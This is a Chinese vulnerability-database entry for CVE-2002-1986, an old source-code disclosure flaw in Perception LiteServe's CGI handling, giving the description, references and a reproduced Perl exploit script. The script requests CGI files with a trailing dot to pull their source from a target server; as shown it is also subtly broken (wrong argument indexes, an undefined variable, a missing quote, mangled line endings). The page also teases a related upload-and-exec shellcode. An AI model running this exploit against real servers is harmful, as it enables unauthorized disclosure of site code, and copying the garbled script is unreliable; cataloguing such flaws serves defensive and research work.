Perception LiteServe CGI源代码泄露漏洞

Perception LiteServe CGI源代码泄露漏洞

漏洞ID 1107098 漏洞类型 访问验证错误
发布时间 2002-11-14 更新时间 2005-10-20
图片[1]-Perception LiteServe CGI源代码泄露漏洞-安全小百科CVE编号 CVE-2002-1986
图片[2]-Perception LiteServe CGI源代码泄露漏洞-安全小百科CNNVD-ID CNNVD-200212-262
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22020
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-262
|漏洞详情
PerceptionLiteServe是一款集成HTTP、FTP、SMTP、POP3和TELNET服务的系统。其中HTTP服务支持CGI接口。Win32平台下的HTTP服务程序处理文件名存在问题,远程攻击者可以利用这个漏洞获得CGI脚本源代码信息。Win32平台下的LiteServeHTTP服务程序对于特殊文件名处理不正确,攻击者提交带有’.’结尾的文件名请求,可导致服务程序返回CGI脚本的源代码信息给攻击者。造成敏感信息泄露,攻击者可以利用此信息进一步对系统进行攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/6188/info

By constructing a malicious web request, it is possible for a remote attacker to disclose the source code of CGI scripts. Information gained through exploiting this issue may aid an attacker in launching further attacks against the target system.

#!/usr/bin/perl
#
# LS_FETCH.PL
# By Matthew Murphy
# LiteServe 2.02 and prior - CGI Disclosure
# Usage: perl ls_fetch.pl [filename] [host] [alias] [port]
use IO::Socket;
use URI::Escape;

$alias = "cgi-isapi"; # Default LiteServe CGI alias
$port = 80;
if (@ARGV < 2 || @ARGV > 4) {
print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80]
} else {
if (@ARGV >= 3) {
$alias = $ARGV[2];
}
if (@ARGV == 4) {
$port = $ARGV[3];
}
$filename = $ARGV[1];
$host = $ARGV[2];
$f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp");
$f->autoflush(1);
$b = sprintf("GET /%s/%s. HTTP/1.0rnrn", $alias, uri_escape($file));
print $f $b;
while (defined($line=<$f>)) {
print STDOUT $line;
}
undef $f;
}
|参考资料

来源:XF
名称:liteserve-script-source-disclosure(10635)
链接:http://www.iss.net/security_center/static/10635.php
来源:BID
名称:6188
链接:http://www.securityfocus.com/bid/6188
来源:VULNWATCH
名称:20021114PerceptionLiteServeHTTPCGIDisclosureVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0074.html
来源:NSFOCUS
名称:3843
链接:http://www.nsfocus.net/vulndb/3843

相关推荐: Linux/x86 – upload + exec Shellcode (189 bytes)

Linux/x86 – upload + exec Shellcode (189 bytes) 漏洞ID 1055171 漏洞类型 发布时间 2005-06-19 更新时间 2005-06-19 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linu…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享